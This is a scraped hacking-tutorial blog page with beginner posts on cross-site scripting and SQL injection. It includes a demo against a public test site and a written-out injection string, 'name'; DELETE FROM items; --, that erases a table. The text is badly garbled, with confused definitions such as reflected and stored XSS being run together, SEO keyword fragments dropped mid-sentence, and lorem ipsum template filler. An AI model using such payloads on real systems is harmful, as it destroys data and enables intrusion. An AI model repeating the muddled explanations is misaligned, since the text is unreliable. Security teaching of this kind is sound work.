    It's refer to client side injection attack where an attacker can execute malicious scripts into a legitimate website or web application.  By leavrging a cross site scipting, an attacker doesn't target the victim directly instead an attacker would exploit a vulnerability within a web applications or websites that the victim would visit essentially using the vulnerable website as a vehicle the deliver the malcious script to the victim's browser. basicallly we will use a website to deliver our payloads to the victime, when victim visit into that they paylaod are will executed and the payload will to our job, payload can be malicious, payload can be simple whatever. xss examples



    Let's talk about impact of XSS



    1) Cookie theft
    2) Keylogging
    3) Phishing
    4) URL Redirection



    cross site scripting can be used to a part of URL redirection. Cookies stealing, Keylogging, Phishing etc.


    so, in order to run our javascript malicious script in a victim's browser, an attacker must first find a way to inject a payload into web page. That's the victim visit. 


    for exploitation, attacker can used social engineering way such as email, click jacking to manipulate user for executation to our payload.



    Let's talk about the Types of XSS...



    Mainly cross site scriptings are parts of three types :-


    1) Reflected XSS
    2) Stored XSS
    3) DOM-based XSS




    Reflected XSS or  Stored XSS 

    It's a most common types of Cross site scripting, attacker payload script has to be part of the request which is send to the website an reflect back in such as a way that the HTTP response includes that the payload.

    so, basically reflected cross site scripting are required client site interaction, if user will visit that the vulnerable web page and server will deliver our paylaod to the users browse here, then user stored this but server want any payload,we will deliver our paylaod to the client browser and if client visiting that then there's a client side attacks. sql injection cheatsheet




    DOM Based XSS :-

    it's a advance type of cross site scripting attack, which be made possibly when the web application client site scripting writes user provides a data into a document objects model. The Most dangerous parts of this attack is client side attacks. how to prevent from sql injection


    In the attacker's payload is never sent to the server, this makes it will more to detect web application firewall and security engineers.


    so basically let's take example of Reflected, stored and DOM through practially,




    This is a website testphp.vulnweb.com


    So we will type something in the search box like Hello or HackingTruth.in and hit go button...









    so it's a reflected but not stored, it's not storing..
    so there may be reflected cross site scripting.



    Now. let's click on the signup option and you can try withlogin based application and if i will give a any text like kumaratuljaiswal.in









    DOM XSS



    if i will give any parameter like hello

    paramter=hello


    <script></script>


    and just executing to the user's context, nor the server side to the sever application, then there may be DOM based...



    Example this


    prompt.mI/O


    this is not sending to the server there are executing to the our context, if i will give anypayload there and it will execute then this is called DOM based scripting. cross site scripting how to prevent


    see this








    so just only executing on the user's script, nor the server side  nor to the client side.




    How to Hunt for XSS ?


    • Find a Input parameter, Give any input there and not senitizer then If your input reflect or stored any where there may be XSS.
    • Try to execute any javascript code there, if you succeed to execute any javascript then there is a XSS
    • Exploitation of XSS.



    you'll find a input parameter then give input there , if your input reflect or stored anywhere there may be cross site scripting. cross site scripting example



    XSS Cheatsheet Here :- Click Here 



    I hope its clear to about The Background concept of cross site scripting :-)



    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal


    Video Tutorial :-  SooN

     


    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)





  • How SQL Query works in database and how to hack database


    How SQL Query works in database and how to hack database


    SQL Injection


    SQL injection attacks uses SQL websites or web applications. It relies on the strategic injection of malicious code or script into existing queries. This malicious code is drafted with the intention of revealing or manipulating data that is stored in the tables within the database. SQL injection

    SQL Injection is a powerful and dangerous attack. It identifies the flaws and vulnerabilities in a website or application. The fundamental concept of SQL injection is to impact commands to reveal sensitive information from the database. Hence, it can result to a high profile attack. How SQL Query works in database and how to hack database


    Attack Surface of SQL Injection


    Bypassing the authentication
    Revealing Sensitive Information
    Compromised Data Integrity
    Erasing The Database
    Remote Code Execution




    https://www.youtube.com/channel/UCa2s3RmE4B-hRsgKSjJLx_w



    How SQL Query Works ?

    Injection of SQL query will be executed on the server and replied by the response. For example, following SQL Query is requester to the server.



    • SELECT  *  FROM  [ Orders ]
    • SELECT column1, column2, ....  FROM table_name;


    These commands will reveal all information stored in the databse "Oredrs" table. If an organization maintains records of their orders into a database, all information kept in this database table will be extracted by the command.






    Learn and understand CEH from scratch. A complete beginner's guide to learn CEH.

    Try it :- It's a Free 





    Otherwise let's understand with another Example



    In the following example, an attacker with the username link inserts their name after the = sign following the WHERE owner, which used to include the string 'name'; DELETE FROM items; -- for itemName , into an existing SQL command, and the query becomes the following two queries:



    • SELECT * FROM items WHERE owner = 'link' AND itemname = 'name'; DELETE FROM items;--






    Many of the common database products such as Microsoft’s SQL Server and Oracle’s Siebel allow several SQL statements separated by semicolons to be executed at once. This technique, known as batch execution, allows an attacker to execute multiple arbitrary
    commands against a database. In other databases, this technique will generate an error and fail, so knowing the database you are attacking is essential.



    If an attacker enters the string 'name'; DELETE FROM items; SELECT * FROM items WHERE   'a' = 'a' ,   the following three valid statements will be created:





    • SELECT * FROM items WHERE owner = 'link' AND itemname = 'name'; 

    • DELETE FROM items; SELECT * FROM items WHERE 'a' = 'a';



    A good way to prevent SQL injection attacks is to use input validation, which ensures that only approved characters are accepted. Use whitelists, which dictate safe characters, and blacklists, which dictate unsafe characters.


    Database





    SQL Delete Query

    The DELETE statement is used to delete existing records in a table. To understand, consider a table "Customers" in a database. The following information is the table "Customers" is containing.






    Execution of  "delete" command will eraase the record.


    • DELETE FROM Customers WHERE CustomerName='Alfreds Futterkiste';


    Now the database table will be like this :-






    There are lots of SQL query commands that can be used. Above are some of the most common and effective commands that are being used for injection.
    for example :-


    • UPDATE Customers SET ContactName = 'KumarAtulJaiswal', city= 'Delhi' WHERE CustomerID = 56;
    • INSERT INTO Customers (column1, column2, column3, ...)
      VALUES (value1, value2, value3, ...); 

    • Customers is a Table Name.


    SQL Injection Tools

    There are several tools available for SQL injection such as :-

    • BSQL Hacker
    • Marathon Tool
    • SQL Power Injecto
    • Havij


     Server Side Technologies

    Server-side technologies come in many varieties and types, each of which offers
    something specific to the user. Generally, each of the technologies allows the creation of dynamic and data-driven web applications. You can use a wide range of server-side technologies to create these types of web applications; among them are the following:

    • ASP
    • ASP.NET
    • Oracle
    • PHP
    • JSP
    • SQL Server
    • IBM DB2
    • MySQL
    • Ruby on Rails

    All of these technologies are powerful and offer the ability to generate web applications that are extremely versatile. Each also has vulnerabilities that can lead to it being compromised, but this chapter is not about those.



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)




  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.